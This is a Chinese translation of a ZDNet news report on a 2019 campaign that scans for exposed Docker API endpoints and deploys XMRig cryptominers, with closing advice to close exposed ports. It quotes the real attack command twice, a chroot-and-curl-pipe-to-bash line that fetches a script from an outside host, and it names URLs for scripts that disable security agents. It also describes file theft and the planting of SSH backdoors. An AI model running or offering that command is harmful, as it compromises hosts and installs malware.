現在都快 2020 年了,但還有不少系統管理員,仍然將 Docker 管理端口暴露在互聯網上。
目前,有家黑客組織正在互聯網上進行大規模的掃描,試圖尋找那些在互聯網上暴露了 API 端點的 Docker 平臺。
黑客組織這次掃描行動的目的,是讓他們能夠向 Docker 實例發送命令,並在公司的 Docker 實例上部署加密貨幣挖礦程序,最終利用他們的算力進行挖礦,從而爲黑客組織自身帶來利益。
專業行動
這次大規模掃描行動於 11 月 24 日開始,由於掃描行動的規模極其龐大,因此一開始就立即引起了人們的注意。
Bad Packets LLC 的首席研究官兼聯合創始人 Troy Mursch 對 ZDNet 稱:“Bad Packets CTI API 的用戶應該清楚利用暴露的 Docker 實例進行攻擊並非什麼新鮮事,而且這種行爲經常發生。”
他指出,“黑客組織這次行動的不同之處在於,他們這次掃描行動規模特別誇張。僅此一點,就值得我們進一步調查,分析他們利用殭屍網絡的意圖究竟是什麼。”
作爲本次掃描行動的發現者,Mursch 說:“正如其他人指出的,這次行動的規模可不是那種腳本攻擊的小孩把戲。黑客組織在這次掃描行動中投入了大量精力,但我們還沒有搞清楚他們到底想幹什麼。”
推特用戶 Bad Packets Report(@bad_packets)在 11 月 25 日發推文稱:
這是一場掃描互聯網上暴露的 Docker API 端點的隨機性大規模掃描行動。
這些掃描行動利用 Alpine Linux 映像來創建一個容器,並通過以下方式執行有效負載:
"Command": chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'
目前我們所掌握的情況
到目前爲止,我們所知道的是,這些攻擊背後的組織正在掃描超過 59000 個 IP 網絡(網絡塊),試圖尋找暴露的 Docker 實例。
一旦黑客組織識別出暴露的主機後,攻擊者就會使用 API 端點啓動 Alpine Linux OS 容器,並在其中執行以下命令:
chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;
上面的命令從攻擊者的服務器下載並運行一份 Bash 腳本。這個腳本的作用就是在目標設備上安裝一個經典 XMRRig 加密貨幣的挖礦程序。Mursch 指出,在這次行動開始後的兩天,黑客組織已經挖出了 14.82 枚門羅幣(XMR),其價格略高於 740 美元。
此外,Mursch 還發現,這種惡意掃描行動還有某種自我防禦的機制。
Mursch 告訴我們:“這次黑客行動,雖然並非原創,但我們觀察到一個有趣的情況,就是黑客組織會從 http://ix.io/1XQh 下載腳本來卸載已知的監視代理程序並殺死大量相關進程。”
Mursch 通過檢查這個腳本,還發現黑客組織不僅正在試圖禁用安全產品,還關閉了與競爭對手的加密貨幣挖礦殭屍網絡(如 DDG)相關的 LSO 進程。
此外,Mursch 還發現,這個惡意腳本還有一個功能,就是它能夠通過掃描受感染的主機來查找 rConfig 配置文件,並對其進行加密和竊取,然後將文件發送回黑客組織的服務器(一般是殭屍網絡)。
此外,Sandfly Security 的創始人 Craig H. Rowland 也注意到,黑客組織還在被入侵的容器上創建後門賬戶,並留下 SSH 密鑰以便更方便他們日後進行訪問,這樣,他們就可以從遠程控制所有受感染的肉雞目標。
Mursch 建議,運行 Docker 實例的用戶和組織,應立即檢查自己是否在互聯網上公開了 API 端點,如果已經公開,就立即關閉端口,然後關停無法識別的運行中的容器。
作者介紹:
Catalin Cimpanu,ZDNet 的信息安全記者,負責報道網絡安全、數據泄露、黑客攻擊和其他相關話題。此前曾擔任 Bleeping Computer 和 Softpedia 的信息安全記者。
原文鏈接:
A hacking group is hijacking Docker systems with exposed API endpoints